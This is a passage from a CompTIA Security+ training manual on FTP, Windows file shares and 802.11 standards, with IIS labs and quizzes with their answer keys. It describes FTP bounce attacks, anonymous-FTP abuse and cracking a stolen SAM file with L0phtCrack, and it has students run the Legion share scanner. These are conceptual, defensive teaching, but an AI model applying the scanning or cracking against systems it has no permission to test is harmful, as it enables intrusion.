In both active and passive FTP, the client initiates a TCP session using destination port 21 to the server. This is the command connection and is used for authenticating the user and transferring commands between the client and the server. The command connection operates just as a normal TCP session should: the client initiates a session using a predetermined destination port number on the server (for FTP, this is port 21), and a source port that is a number greater than 1023. The differences in how the two types of FTP operate are in the data connection that is set up when the user wants to transfer data between the two machines. For example, if the user issued FTPs GET command to download a file (the command might take the form get resume.doc to download the file resume.doc), the client sends the get command using the command connection, and then the server negotiates the opening of a second TCP connection to actually transfer the files data. Active FTP In active FTP, which is FTPs default operation, the FTP server creates a data connection by opening a TCP session using a source port of 20 and a destination port greater than 1023. This is contrary to TCPs normal operation in which the destination port of a new session is fixed and the source port is a random high port above 1023. Active FTP is an issue because securitys best practices dictate that connections can be initiated outbound from a trusted network to an untrusted network, but not vice versa. In a situation in which the client sits behind a firewall of an internal trusted network and the server is out on the Internet, active FTP breaks this policy. Active FTP requires that the server initiate a connection inbound to the client to transfer data, as shown in Exhibit 7-3.

Exhibit 7-3: Setup of active FTP data connection Most modern stateful firewalls accommodate this issue by actually watching the negotiation between the client and server and automatically opening the agreed upon port so the client can receive the connection from the server. Simple packet-filtering firewalls do not have this level of intelligence. To permit active FTP using packetfiltering firewalls, one must allow all high ports (because one never knows what port will be negotiated by the client and server) to reach internal clients from outside the trusted networka very dangerous proposition. The situation can be slightly mitigated by only allowing incoming connections from port 20. People seeking to exploit this weakness could easily craft packets from that port as well.

712

CompTIA Security+ Certification Passive FTP In passive FTP, which is not supported by all FTP implementations, the client initiates the data connection to the server (therefore, the server is said to be passive because its only accepting a connection instead of originating one). As shown in Exhibit 7-4, the passive FTP client initiates the data connection to the server with a source and destination port that are both random high ports.

Exhibit 7-4: Setup of the passive FTP data connection This solves the firewall issue just mentioned, because the client initiates both connections, so the client does not violate his own security policy by allowing an inbound connection from the Internet. This opens up a security issue for the FTP server: now the server must allow inbound connections on all high ports in order to accommodate passive FTP data connections. Most stateful firewalls accommodate this by monitoring the control connection to determine which port is used for the data connection, and then opening that single port between the server and the client. The same issue exists for packet-filtering firewalls which are not equipped to look that deeply into the FTP packet; a packet-filtering firewall that is protecting the active FTP server has to be configured to accept all ports to the server in order to accommodate passive FTP.

FTP security issues


Some of the better-known FTP security issues are outlined in the following sections. Bounce attack The Bounce attack uses the fact that RFC 959, the standards document outlining FTP, gives the active FTP client the power to cause the FTP server to open a data connection to any IP address on any port. This can be used to anonymously attack other systems on the Internet. RFC 2577, FTP Security Considerations, outlines an example of such an attack. For instance, a client uploads a file containing SMTP commands to an FTP server. Then, using an appropriate PORT command, the client instructs the server to open a connection to a third machines SMTP port. Finally, the client instructs the server to transfer the uploaded file containing SMTP commands to the third machine. This might allow the client to forge mail on the third machine without making a direct connection, and makes it difficult to track attackers.

Directory and file transfer services Clear text authentication and data transmission

713

Another vulnerability lies in the fact that FTP traffic is sent unencrypted in clear text. This includes both the username/password pair and the data itself. Anyone with a packet sniffer can own a copy of the data transferred via FTP, as well as the login information used to obtain it. Glob vulnerability A nonstandard issue with many FTP implementations is that they permit the client to use the (*) wildcard in FTP commands. The wildcard is a very useful tool that allows a user to perform an operation on multiple files at once. For example, the command del ap* causes the files application.doc and apple.pic to be deleted. Hackers can exploit this behavior to create buffer overflows and therefore gain control of the server. This is called the glob vulnerability. Software exploits and buffer overflow vulnerabilities There are many known vulnerabilities associated with various implementations of FTP. For example, a well-documented buffer overflow vulnerability in wu-ftp (a common FTP server implementation) has been responsible for thousands of compromised UNIX and Linux boxes. Anonymous FTP and blind FTP access The practice of setting up anonymous FTP servers across the Internet is extremely common. This originates with an FTP servers default position of allowing anyone authenticating with the username anonymous and any password (good Netizens use their e-mail address as a password) access to a directory on the server. This practice allowed people around the world to easily share data and files with the world without too much overhead or red tape. Many software vendors set up anonymous FTP sites to distribute updates and patches for their products. FTP search engines exist that make finding thousands of anonymous FTP sites quick and easy. The transcript below is from an anonymous FTP session. Information entered by the user appears in bold typeface:
C:\ >ftp leech.stat.umn.edu Connected to leech.stat.umn.edu. 220 leech.stat.umn.edu FTP server (Version wu-2.4.2academ[BETA-18](1) Thu Sep 2 GMT 2001) ready. User (leech.stat.umn.edu:(none)): anonymous 331 Guest login ok, send your complete e-mail address as password. Password: 230-Please read the file README 230- it was last modified on Fri Dec 13 14:14:31 1996 - 2024 days ago 230 Guest login ok, access restrictions apply. ftp>

In the first line of this transcript, the user issued a command to run the FTP client and connect to the site called leech.stat.umn.edu. The user could just as easily have entered the servers IP address. In the second line, you see the connection was successful, and in the following line, the FTP server has provided some basic information about itself. Its running version 2.4.2 of wu-ftp. The server immediately provides the User prompt so the user can log on to it.

714

CompTIA Security+ Certification Here you see the user provided the login of anonymous to get access with visitor privileges. The server has been configured to accept the anonymous login account; it requests the user provide his or her e-mail address as a password, although any string of characters is often accepted by anonymous FTP servers. After the password was entered, the server prints a brief banner message instructing the guest to read the file README. You know the anonymous user credentials were accepted, because the server noted Guest login ok. Finally, you see the ftp> prompt, indicating the user is now able to enter an FTP command. Although properly secured and monitored anonymous FTP sites are a valuable and wellused Internet resource, unmonitored anonymous FTP servers can often be used as storehouses for warez (pirated software with the copy protection mechanisms removed). Pirates use anonymous FTP sites for storage because they often have more bandwidth than their own Internet connections, making it easy to share and trade their warez. Companies that do not monitor their anonymous FTP sites for this type of behavior risk a black eye in the public relations arena if it becomes known that their servers are used for this type of illegal activity. A potentially worse situation could arise if the anonymous account is not properly restricted to access only designated directories. If an anonymous FTP server is misconfigured and permits anonymous visitors to write to any directory, then malicious visitors could upload files that would result in their gaining root access and control of the server. Even if the malicious user could only read any directory, then he could download files containing user passwords and decrypt them using password cracking tools. If you decide to setup an anonymous FTP server, be sure its properly secured. CERT provides a document entitled Anonymous FTP Configuration Guidelines to help in this task. It is available at:
www.cert.org/tech_tips/anonymous_ftp_config.html.

A variant of the anonymous FTP site is a blind FTP site. With blind FTP sites, a user logs on as anonymous, but is then restricted to a single directory and is not able to obtain a listing of files in the directory. Blind FTP sites offer more security than anonymous sites, because the user must know the exact filename of a desired file in order to download it. There is still no way to account for who has logged on to the server and accessed a given file. If a user who is given a particular filename by an administrator chooses to share it with others, then the privacy sought by setting up the blind server is compromised.

Directory and file transfer services

715

FTP countermeasures
Its clear from aforementioned issues that FTP is an easy target for hackers. There are, however, solutions to the FTP quandary: Do not allow anonymous access unless a clear business requirement exists to do so. Employ a state-of-the art firewall such as a Cisco PIX or Check Point FireWall1 that performs content inspection of FTP commands. Ensure your FTP server has the latest security patches and that it has been properly configured to limit user access. Encrypt your data before placing it on an FTP server, so it cannot be sniffed in transit to its destination. The recipient needs the appropriate keys to decrypt the data once it has been received. Encrypt the FTP data flow using a Virtual Private Network (VPN) connection. Switch to a secure alternative to FTP, such as the Secure File Transfer Protocol outlined in the next section.

716
Do it!

CompTIA Security+ Certification

B-1:

Creating a new FTP site Heres why


(If necessary.) This activity requires that you pair up with a partner. On each server, you and your partner will create an ftp site and test its connection.

Heres how
Students will work in pairs for this activity.

1 Log on to your server as administrator

2 Create a folder called ftp located in the root directory of your system 3 Click Start and then right click
My Computer

Choose Manage 4 Expand Services and


Applications

The Computer Management window appears.

5 Expand Internet
Information Services

6 Expand FTP Sites

7 Right-click FTP Sites Choose New, FTP Site 8 Click Next 9 Enter My FTP Site Click Next 10 Click Next 11 Click Next 12 In the path box, type c:\ftp 13 Click Next 14 Check Write Click Next
To keep the default settings for the IP Address and TCP Port Settings. To accept the default of not isolating users. If your root directory is different than c:\, substitute the root directory on your system. The FTP Site Access Permissions screen appears. For the description. The FTP Site Creation Wizard will begin.

Directory and file transfer services 15 Click Finish

717

(To close the Wizard.) Notice that your ftp site is stopped. To start your ftp server, youll have to first stop the Default FTP Site In Computer Management.

16 Right-click Default FTP site Choose Stop 17 Right-click My FTP site


(Stopped)

Choose Start 18 Click Start and then choose


Run To open a Command window. You will try logging onto your partners FTP site.

Type cmd and press e 19 At the command prompt, enter


ftp

20 At the ftp prompt, type


open <your partners IP address>

Press e 21 Enter anonymous 22 Enter password 23 Enter quit


As the user. As the password. You will be connected. To end the ftp session.

718

CompTIA Security+ Certification

Requiring authentication
Explanation The default setting for an FTP site is to allow anonymous access; however, there are times when its necessary to control access. The Windows Server 2003 FTP Server service has capabilities to remove anonymous access and require user authentication. The major risk when switching to authentication is that the usernames and passwords are sent in clear text, which can be sniffed with a protocol analyzer.

Do it!

B-2:

Controlling access to the FTP site Heres why


To deny anonymous access to your ftp site.

Heres how
1 Switch to the Computer Management window and rightclick My FTP Site Choose Properties 2 Activate the Security Accounts tab

3 Clear Allow anonymous


connections

Youll receive the message shown below.

Click Yes 4 Click Apply

Directory and file transfer services 5 Switch to the Command window and enter ftp 6 At the ftp prompt, enter open
<your partners IP address>

719

Make sure both partners have completed step 5 before they continue with step 6. The remainder of the activity might not work correctly.

7 Enter anonymous 8 Enter password

For the username. For the password. The login will fail because a valid account with a password is required. Anonymous access will no longer be allowed, but there is a risk of having the password sniffed on the network.

9 At the ftp prompt, enter user Enter user1 Enter the password for the User 1 account 10 Enter quit

To reattempt login. For the username. You'll be connected.

To end the ftp session.

720

CompTIA Security+ Certification

The threat of password sniffing


Explanation Removing anonymous access to an FTP site makes it vulnerable to password sniffing. One way to counter this vulnerability is to restrict access to the site by IP address. A user trying to access the site would have to provide a valid username and password, and would have to access the site from the appropriate computer. This method can be very effective in preventing someone on the outside from using a sniffer to obtain a username

Do it!

B-3:

Configuring FTP TCP/IP restrictions Heres why

Heres how
1 Switch to the Computer Management window 2 Activate the Directory Security tab

3 Click Add

4 Enter the IP address of your partners server Click OK 5 Click Apply

Directory and file transfer services 6 Switch to the Command window and at the ftp prompt, enter open
<your partners IP address>

721

Make sure both partners have completed step 5 before they continue with step 6. The remainder of the activity might not work correctly.

7 At the ftp prompt, enter user1 Enter the password for the User 1 account 8 Enter quit 9 Close the Command window 10 When both you and your partner are finished testing the ftp connection, return to the Directory Security tab and remove your partners IP address 11 In Computer Management, stop the My FTP Site and restart the Default FTP Site

To reattempt login. Youll be denied access because your IP address has been denied access. (To end the session.)

Expand Services and Applications, expand Internet Information Services, and expand FTP Sites to stop/start the ftp sites.

12 What are the options available for TCP/IP Access Restrictions? (Choose all that apply.)
A

Granted access Enable access Denied access Full access

B
C

13 If an IP address has been denied access to an FTP server: A B C


D

Users can logon using the administrator password Users can logon using their password Users can logon using an Anonymous account Users will not be able to access the server

14 All IP addresses are granted access by default. True or false?


True

15 Close Computer Management

722

CompTIA Security+ Certification

Secure file transfers


Explanation Several attempts have been made to address FTPs security shortcomings. RFC 2228, FTP Security Extensions, was released in 1997 to address the issue of FTPs clear text authentication, but it has not been widely adopted. Several propriety Secure FTP products have also been released by various vendors, offering secure authentication (and in some cases secure data transfer) but have been given a lukewarm reception in the marketplace. Other strategies to secure FTP have involved conducting file transfers through an encrypted tunnel via an SSL or IPSec VPN.

S/FTP
The most commonly used Secure File Transfer Protocol (S/FTP) is not a rehash of traditional FTP at all, but is a new component of the Secure Shell (SSH) protocol introduced with SSH version 2 (SSH2). The OpenSSH man page offers the following description of S/FTP: S/FTP is an interactive file transfer program, similar to ftp, which performs all operations over an encrypted ssh transport. It might also use many features of ssh, such as public key authentication and compression. S/FTP connects and logs into the specified host, then enters an interactive command mode. The key words in this quote are similar to ftp, because of the protocols name, Secure FTP, one might expect that S/FTP is a method of securing traditional FTP, but it is not. The only relationship between S/FTP and traditional FTP is that S/FTP employs the older variants command syntax. Rather than a protocol, S/FTP is an FTPlike program provided as part of the SSH suite to securely transfer files. S/FTP does not provide any new network protocols; it only provides an FTP-like user interface to use the existing SSH2 encryption mechanisms to transfer files. Notice that SSHs Secure File Transfer Protocol (S/FTP) should not be confused with the Simple File Transfer Protocol (SFTP) defined in RFC 913. The latter is easier to implement than the original FTP, and the former is not a protocol at all, but a program that leverages SSH to securely transfer files between hosts. Secure Shells S/FTP standard has a number of benefits over traditional FTP: S/FTP uses the underlying SSH2 protocol, so it offers strong authentication using a variety of methods including X.509 certificates. It uses SSH2, S/FTP encrypts authentication, commands, and all data transferred between the client and the server using secure encryption algorithms. SSH2 uses a single, well-behaved TCP connection (as compared to active FTP, which opens a reverse connection, and passive FTP, which opens a connection on a random high port) it is easy to configure a firewall to permit S/FTP communications. S/FTP uses the same TCP port as SSH2, port 22. Traditional FTP clients and servers negotiate the IP address and port for opening the data connection, its difficult to use Network Address Translation (NAT) on FTP connections. S/FTP avoids this issue altogether because no negotiation is required to open a second connection.

Directory and file transfer services The following table displays SecureFTP implementation programs:
Program SSH Note

723

The SSH product produced by the company of the same name, offering both server and client software. http://ssh.com/support/downloads/ An open source version of SSH. http://sshwindows.sourceforge.net/ A freeware SSH client implementation for Windows operating systems. www.chiark.greenend.org.uk/~sgtatham/putty/

OpenSSH PuTTY

724
Do it!

CompTIA Security+ Certification

B-4:

Understanding file transfer services

Questions and answers


1 Provide the TCP port numbers for the following FTP sessions: Active FTP source port Active FTP destination port Passive FTP source port Passive FTP destination port FTP command source port FTP command destination port
20 >1023 >1023 >1023 >1023 21

2 FTP traffic is sent unencrypted in clear text. True or false?


True

3 With blind FTP sites, a user logs on as anonymous, but is then restricted to a single directory and is not able to obtain a listing of files in the directory. True or false?
True

4 In passive FTP, the server initiates the data connection to the client. True or false?
False

5 The terms active and passive in FTP refer to the clients role in setting up the data connection. True or false?
False: It refers to the servers role.

6 Secure File Transfer Protocol (S/FTP) is an extension of FTP. True or false?


False: It is a new component of the Secure Shell protocol.

7 Audits for file shares should be conducted in complete secrecy. True or false?
False: Audits should be conducted with management approval, including any required change management sign-offs, and should be carefully documented.

Directory and file transfer services

725

Topic C: File sharing


This topic covers the following CompTIA Security+ exam objective:
# 2.5 Objective Recognize and understand the administration of the following file transfer protocols and concepts File Sharing Vulnerabilities Packet Sniffing

File shares
Explanation A common way of sharing files is using file shares on a Microsoft Windows network. This method was originally intended to share files on a local area network (LAN) rather than across the Internet as FTP is used, although current versions of Windows allow mapping via IP connections. File shares are popular because they are easy to set up, and they use the Windows graphical interface. Very little computer knowledge is required for people to share files across the network using file shares; one simply views the files or folder's properties and selects the appropriate check box, as shown in Exhibit 7-5.

Exhibit 7-5: File sharing in Windows Server 2003 Shared files can be configured as peer-to-peer (so that multiple desktop computers can access files on another desktop computer) or as client/server shares (set up to provide users with centralized network storage on a server).

726

CompTIA Security+ Certification

Vulnerabilities
Although file shares seem both harmless and indispensable, there are indeed several risks that security administrators need to manage carefully. First, there is the risk of confidentiality of data, because most users control file sharing on their own desktop computers, they can open shares on their machines that could accidentally become liabilities. Take for example an accountant who shares his My Documents folder to let his coworkers access his collection of MP3 music files. If the accountant accidentally saves a spreadsheet containing the salaries of all employees into the same folder, he could inadvertently give confidential information to people who should not have access to it. Second, there are viruses that spread via network shares. If many users on the network have unmonitored and uncontrolled network shares, they can cause malware such as the Funlove virus to spread rapidly, damaging files and causing huge losses to productivity as administrators battle the infection and workers are unable to perform their functions because their programs no longer work. Finally, other types of critical information besides user documents could become compromised if file shares are misconfigured. One example of this is the C: drive on Windows machines. If the entire drive were accidentally shared, then an attacker has the ability to access important files in the C:\Windows directory. In this case, an attacker could launch a denial-of-service attack on the machine by deleting critical files, or could download the SAM file that contains the username and password of everyone who has ever logged onto the machine. After downloading the SAM file, an attacker can crack it using tools such as L0phtCrack.

Protecting your file shares


To protect your network from the risks posed by unauthorized file shares, your organization needs to define a policy regarding the use of file shares. After the policy has been defined and communicated to all users as part of a security awareness program, security administrators can take action to ensure the policy is respected by conducting audits of file shares. Audits should be conducted with management approval, including any required change management sign-offs, and should be carefully documented. Most commercial scanning and audit tools can identify file shares. Freeware scanners for file shares include: Legion http://packetstormsecurity.org/groups/rhino9 SMBScanner
http://home.ubalt.edu/abento/753/enumeration/enumerationtoo ls.html

For more details on how to use these tools and auditing best practices, see Jaime Carpenters article entitled Open File Shares: An Unexpected Business Risk at the SANS Reading Room ( www.sans.org/rr/).

Directory and file transfer services Do it!

727

C-1:

Understanding file sharing

Questions and answers


1 Which of the following features is true of file sharing?
A B C D

Can share files on a LAN Can share files over an IP connection Can be configured as peer-to-peer Can be configured as client/server

2 What are some of the risks associated with file sharing? A B C


D

Sharing confidential data Spreading viruses Compromising system files All of the above

3 What are some recommendations for protecting file shares?


Define a policy and communicate it to all users Conduct audits of file shares

728

CompTIA Security+ Certification

Unit summary: Directory and file transfer services


Topic A In this topic, you learned that LDAP eliminates the necessity to authenticate at multiple servers in order to access different applications and network resources. Using X.500 directory services, LDAP simplifies both the logon process and administration of all network resources. In this topic, you learned that ftp is a file transfer mechanism commonly used on the Internet. You learned that ftp is not a secure protocol and that S/FTP, which is based on SSH version 2, is the recommended solution. In this topic, you learned that uncontrolled file shares on Windows networks could be a potential weak spot in many networks. File shares should be centrally administered on file servers, and periodic audits should be conducted to identify and remove unauthorized file shares.

Topic B

Topic C

Review questions
1 Information about network resources is stored as a(n) __________ in the directory services database.
object

2 A commonly used directory service protocol that was developed by the IETF is __________.
LDAP

3 The Microsoft implementation of directory services is called ________________________.


Active Directory

4 PKI, user administration, and single sign-on are some of the applications of LDAP. True or False?
True

5 List the elements in the X.500 hierarchical structure from the top to the bottom.
Root, country, organization, organizational unit, leaf objects

6 Distinguished names do not need to be unique. True or False?


False

7 LDAP provides authentication and authorization services. It also provides encryption by utilizing other protocols. True or False?
True

8 List the security vulnerabilities you need to protect your LDAP service from.
DoS, man-in-the-middle, and attacks against data confidentiality

Directory and file transfer services

729

9 List the steps you can take to secure the LDAP server from the vulnerabilities that can affect it.
Apply the latest OS and application security patches, remove unneeded services and applications, configure strong authentication, block LDAP at the firewall.

10 FTP is one of the most secure services on the Internet. True or False?
False

11 Which TCP port is used to initiate an FTP session?


Port 21

12 Compare active FTP and passive FTP.


In active FTP, which is FTPs default operation, the FTP server creates a data connection by opening a TCP session using a source port of 20 and a destination port greater than 1023. In passive FTP, which is not supported by all FTP implementations, the client initiates the data connection to the server (therefore, the server is said to be passive because its only accepting a connection instead of originating one).

13 List some of the FTP security issues you should guard against.
Bounce attacks, clear text authentication and data transmission, glob vulnerabilities, software exploits and buffer overflow vulnerabilities, anonymous FTP and blind FTP access.

14 The default settings for an FTP site is to require usernames and passwords. True or False?
False: The default is anonymous access.

15 How can you prevent password sniffing when users are connecting to an FTP server?
Restrict access to the site by IP address. A user trying to access the site would have to provide a valid username and password, and would have to access the site from the appropriate computer.

16 List the vulnerabilities of using Windows file shares.


Risk to confidentiality of data, viruses spreading via network shares, and other types of critical information besides user documents could become compromised if file shares are misconfigured.

17 File shares are peer-to-peer only. True or false?


False: They can also be client/server shares.

18 List some ways you can protect file shares.


Establish a policy and communicate it to users. Audit the network to ensure that the policy is being followed.

19 List some methods of securing FTP file transfers.


Using Secure FTP products, conduct file transfers through an encrypted tunnel via SSL or IPSec VPN.

20 S/FTP is simply a re-write of the FTP service. True or False?


False: It is a component of the SSH protocol.

730

CompTIA Security+ Certification

Independent practice activity


In this activity, youll configure a file share on a Windows network: 1 Open My Documents in Windows. 2 Right-click in the right pane and choose New, Folder. 3 Rename the new folder to Dangerous. 4 Right-click the Dangerous folder, and choose Properties. 5 Activate the Sharing tab. 6 Select Share this folder. 7 Click OK. 8 Create a new text document, and save it to the Dangerous folder. 9 On another computer in the network browse to Dangerous through My Network Places. 10 Open the text file and modify it. 11 Were you able to open the file? Were you able to save the file? Why or why not?
You should have been able to open the file, but you shouldnt have been able to save the file. Default permissions on the folder only allow the group Everyone to Read the file.

12 On your computer, display properties for the Dangerous folder. Change the permissions for the group Everyone to allow Change. (Activate the Sharing tab, click Permissions, check Change in the Allow column.) 13 On the other computer, try saving the file again. 14 Were you able to save it now?
Yes

15 On the first computer, check the text file for modifications. Next, youll scan your own computer for file shares using Legion. This file can be found under packetstormsecurity.nl/groups/rhino9/. 16 Download the file legionv21.zip according to your instructor's directions. 17 Unzip the file to C:\Security. 18 Run the Setup program Setup.exe. 19 Click Next at the Welcome screen. 20 Click Next at each screen to accept the defaults. Click Finish to exit the installation program. 21 Click Start, then choose All Programs, Legion to run the program. 22 Enter the starting IP address in the Scan from text boxes. 23 Click Scan. 24 What file shares were detected on your computer?
Dangerous should appear in the share list.

25 Close Legion.

81

Unit 8 Wireless and instant messaging


Unit time: 90 minutes Complete this unit, and youll know how to:
A Discuss 802.11 standards. B Describe the Wireless Application Protocol

(WAP) and explain how it works.


C Describe Wired Equivalent Privacy (WEP). D Discuss instant messaging.

82

CompTIA Security+ Certification

Topic A: IEEE 802.11


This topic covers the following CompTIA Security+ exam objective:
# 2.6 Objective Recognize and understand the administration of the following wireless technologies and concepts 802.11 and 802.11x

IEEE 802 LMSC


Explanation In 1980, the Institute of Electrical and Electronics Engineers (IEEE) created the 802 LAN/MAN Standards Committee (LMSC). This committee was tasked to create standards of operability related to local area networks (LANs) and metropolitan area networks (MANs). In 1990, the committee formed the 802.11 working group to define the interface between wireless clients and their network access points. The 802.11 working group finalized its first standard in 1997. IEEE 802.11 defines three types of transmission at the Physical (PHY) layer: Diffused infrared, based on infrared transmissions Direct sequence spread spectrum (DSSS), based on radio transmissions Frequency hopping spread spectrum (FHSS), also based on radio transmissions WEP was established as an optional security protocol. The group also specified the use of the 2.4 GHz industrial, scientific and medical (ISM) radio band because it was the only band was available and unlicensed in most countries of the world. Within this band, the group limited its work to the Physical layer and the Media Access Control (MAC) sublayer of the Data Link layer, leaving the Logical Link Control (LLC) sublayer and higher layers of the OSI model to existing standards. The group also mandated a 1 Mbps data transfer rate and an optional 2 Mbps data transfer rate. As the 802.11 project developed, the members of the working group found it necessary to add additional working groups to more efficiently tackle their task. As these subgroups were added, each was designated with a letter, starting with a and going through j. The four most prominent of these groups have been 802.11b, 802.11a, 802.11i, and 802.11g. Some of these working groups have already approved new standards, others are still working, and two others, 802.11c and 802.11j, have been respectively folded into another working group or disbanded. Two other 802 working groups, 802.15 (covering wireless personal area networks or Wireless PANs) and 802.16 (covering wireless metropolitan area networks or Wireless MANs), are also working on wireless standards. These standards are only briefly mentioned since they are not covered on the exam.

Wireless and instant messaging

83

802.11a
The IEEE approved the 802.11a standard in 1999 and titled it High-speed Physical Layer in the 5 GHz Band. This standard sets specifications for an additional type of data transmission at the Physical layerthe Coded Orthogonal Frequency Multiplexing (COFDM) protocol. The COFDM layer provides data transmission rates of 6, 9, 12, 18, 24, 36, 48, and 54 Mbpsa major improvement over the 5.5 Mbps or 11 Mbps offered by 802.11b. The radios consist of either wireless NIC cards or wireless access points (APs), and they operate by converting the digital and analog signals between the client and the wired network. Communications are established at the fastest possible data rate, which is dependent upon the distance between the client and network and the strength of the signal. One major benefit of operating in the 5 GHz band is that 802.11a devices do not have to compete with many other devices, such as cordless phones, microwave ovens, and baby monitors (though baby monitors are usually not a problem in a corporate environment).

802.11b
The 802.11b standard was approved in 1999, concurrently with 802.11a. The IEEE named the 802.11b standard the Higher-Speed Layer Extension in the 2.4 GHz Band. The IEEE also established specifications for an additional type of data transmission at the Physical layerthe High-Rate Direct Sequence Spread Spectrum (HR/DSSS) protocol. This protocol allows for data transmission at either 5.5 Mbps or 11 Mbps (which is as fast as standard Ethernet and much faster than most Internet connections) instead of the mandatory 1 Mbps or the optional 2 Mbps data transmission rate offered by the original 802.11 standard. In 2001, the 802.11b standard came under heavy criticism because of security flaws in WEP. The Wireless Ethernet Compatibility Alliance (WECA), an equipment testing and certification group, created a standard based on 802.11b that is dubbed Wi-Fi, a trademark that is short for wireless fidelity.

802.11c
The IEEE working group C was responsible for creating 802.11c, which would develop MAC bridging functionality. This group was folded into the 802.1D standard. 802.1D is focused on MAC bridging in wired LANs and should not be confused with 802.11d.

802.11d
The IEEE working group D is responsible for determining the requirements necessary for 802.11 to operate in other countries and incorporating those requirements into 802.11d. The work of this group continues.

84

CompTIA Security+ Certification

802.11e
The IEEE working group E is responsible for creating the 802.11e standard, which will add multimedia and Quality of Service (QoS) capabilities to the MAC layer and therefore guarantee specified data transmission rates and error percentages. This proposal is still in draft form. When this work is completed, it will have a beneficial affect on 802.11a, 802.11b, and 802.11g. The 802.11e standard will also impact 802.15, which is assigned the task of creating wireless personal area networks (Wireless PANs), and 802.16, which is assigned the task of creating Wireless MAN standards. Without an improvement in QoS, many of the benefits of higher rates of data transmission, such as video streaming and wireless Voice over IP (wireless VoIP), will not materialize.

802.11f
The IEEE working group F is responsible for creating the 802.11f standard, which will allow for better roaming between multivendor access points and distribution systems (different LANs within a WAN) than is currently feasible under 802.11.

802.11g
The IEEE working group G created a draft 802.11g standard, was approved in June 2003. This standard offers a raw data throughput rate of up to 54 Mbpsfive times higher than 802.11b. The 802.11g specification is backward compatible with the widely deployed 802.11b standard.

802.11h
The IEEE working group H is responsible for creating 802.11h, which is required to allow for European implementations requests regarding the 5 GHz Physical layer. Two requirements of this standard are that it limits the PC card from emitting more radio signal than is needed and allows devices to listen to radio wave activity before picking a channel on which to broadcast. This standard was approved in 2003.

802.11i
The IEEE working group I is responsible for fixing the serious security flaws in WLANs by developing new security standards. This standard was approved in 2004, however, its apparent that its initial medium-term intent was to create a new standard that would be at least somewhat backward compatible with the original WEP so that a total transformation of existing equipment need not be necessary. This fix will probably involve increasing the number of required bits in the temporal keys to 128, the use of fast packet keying, and key management. In the long term, the working group hopes to eliminate WEP altogether and replace it with what it is calling the Temporal Key Integrity Protocol (TKIP), which would require that keys be replaced within a certain amount of time. As discussed in the WEP section of this unit, WEP does not currently require these keys be replaced at all.

Wireless and instant messaging

85

802.11j
The IEEE working group J "Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications: 4.9 to 5 GHz Operation in Japan" addresses Japanese government regulations regarding the use of Wireless LANs in the 4.9 and 5 GHz bands in indoor hot spot, fixed outdoor, and nomadic or mobile modes. This was approved in November 2004. A summary of IEEE 802.11 working groups is provided in the following table:
Working group 802.11a Primary task Worked to establish specifications for wireless data transmissions in the 5 GHz band Worked to establish specifications for wireless data transmission in the 2.4 GHz band Worked to establish wireless MAC bridging functionality Working to determine requirements that will allow 802.11 to operate outside the United States Worked to add multimedia and Quality of Service (QoS) capabilities to wireless MAC layer Worked to allow for better roaming between multivendor access points and distribution systems Worked to provide raw data throughput over wireless networks at a rate of up to 54 Mbps Worked to allow for European implementation requests regarding the 5 GHz band Worked to fix security flaws in WLANs by developing new security standards Worked to address meeting Japanese government requirements for 4.9 to 5 GHz band use. Status of work Approved 1999

802.11b

Approved 1999

802.11c

Folded into 802.1D

802.11d

Approved 2001

802.11e

Approved 2005

802.11f

Approved 2003

802.11g

Approved 2003

802.11h

Approved 2004

802.11i

Approved 2004

802.11j

Approved 2004

The IEEE is dealing with all of the technology issues that arise as it tries to set standards for wireless data transmission and processing. At some point, all of these groups will have completed their work, and other challenges will arise that need to be dealt with as time goes on.

86
Do it!

CompTIA Security+ Certification

A-1:

Discussing IEEE 802.11 protocol

Questions and answers


1 The IEEE work groups were named in sequential alphabetical order from which of the following? (Choose all that apply.) A B
C

a through f a through i a through j a through m

2 Which of the following are physical layers as defined by 802.11 protocols?


A

DSSS COFDM FHSS Diffused infrared MAC

B
C D

3 Which of the following data transmission rates does 802.11b support? (Choose all that apply.) A
B

1 Mbps 5.5 Mbps 10 Mbps 11 Mbps 54 Mbps

C
D

4 The 802.11g protocol will offer throughput rates of up to _______. A B


C

10 Mbps 22 Mbps 54 Mbps 128 Mbps

5 Which of the following working groups is responsible for fixing the security flaws in WLANs? A
B

802.11j 802.11i WAP Forum 802.1x 802.11g

C D E

Wireless and instant messaging Do it!

87

A-2:

Creating a wireless network (demonstration only) Heres why


The first step in creating a wireless network is to install and configure the router or wireless access point (WAP). In this activity, youll use a Linksys WAP11 Wireless Access Point to connect wireless devices. The Linksys WAP11 is initially installed from CD and can then be configured through a browser.

Heres how
Introduce this activity as a demonstration. Students should observe only.

1 Connect the Category 5 Ethernet network cable to the Linksys WAP11 Access Point

2 Connect the other end of the cable to the classroom switch or hub 3 Connect the AC Adapter to the WAP11 power port and to an electrical outlet
Use the Instructors PC to demonstrate the installation procedure.

The Access Point is now connected to your 10/100 network. To avoid damage to your unit, only use the power adapter supplied with the Access Point.

4 At the laptop PC, insert the Linksys Setup Wizard CD in the CD-ROM drive

The Welcome Screen appears. If the autorun program does not start, choose Start, Run, and enter D:\setup.exe (if D: is your PCs CD-ROM drive).

5 Click Setup

The Connecting the Wireless Access Point screen appears.

6 Click Next

88

CompTIA Security+ Certification 7 Click Next


The initial Setup screen appears.

Click Yes 8 In the Password field, enter the default password, admin

(To change the settings.) The system prompts for a password.

Click OK 9 Change the IP Address and the


Subnet Mask (If necessary to conform to the classroom setup.) The IP Address must be unique to your network. You can assign any unique name to the Access Point.

Change the AP Name

When finished, click Next 10 In the SSID field, type SECCLASS

The Basic Settings screen appears.

Changing the SSID field from the default is important in order to protect the LAN from intrusion.

Click Next

Wireless and instant messaging 11 Click Next

89

(To continue through the Security (Optional) screen.) The Confirm Your Network Settings screen appears.

12 Review your settings, then click


Yes

Your changes are saved.

Click Exit

(To complete the basic setup.) The Access Point is now configured for the classroom network.

810

CompTIA Security+ Certification

Topic B: WAP 1.x and WAP 2.0


This topic covers the following CompTIA Security+ exam objective:
# 2.6 Objective Recognize and understand the administration of the following wireless technologies and concepts WEP / WAP (Wired Equivalent Privacy / Wireless Application Protocol) WTLS (Wireless Transport Layer Security)

The WAP protocol


